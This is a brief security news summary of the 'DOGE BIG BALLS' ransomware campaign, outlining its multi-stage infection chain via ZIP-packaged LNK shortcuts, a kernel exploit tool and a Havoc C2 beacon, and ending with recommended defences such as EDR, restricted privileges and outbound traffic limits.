DOGE 'Big Balls' Ransomware Utilizes ZIP-Based LNK Shortcuts and BYOVD Techniques for Stealthy Attacks - #DogeBigBalls
A new ransomware campaign called "DOGE BIG BALLS" has been discovered, utilizing a complex multi-stage infection process. The attack begins with a ZIP file containing a deceptive LNK shortcut that executes PowerShell commands to download and run a script. This script checks for administrative privileges and, if present, downloads a disguised version of Fog ransomware and a kernel exploit tool. The ransomware employs sophisticated techniques, including kernel-level access exploitation, detailed system information collection, and geolocation via the Wigle.net API. It also incorporates a Havoc C2 beacon for potential post-encryption activities and uses anti-analysis techniques to evade detection. To defend against such threats, experts recommend implementing various security measures, including blocking untrusted files and scripts, monitoring for anomalies, deploying EDR solutions, limiting administrative privileges, and restricting outbound traffic.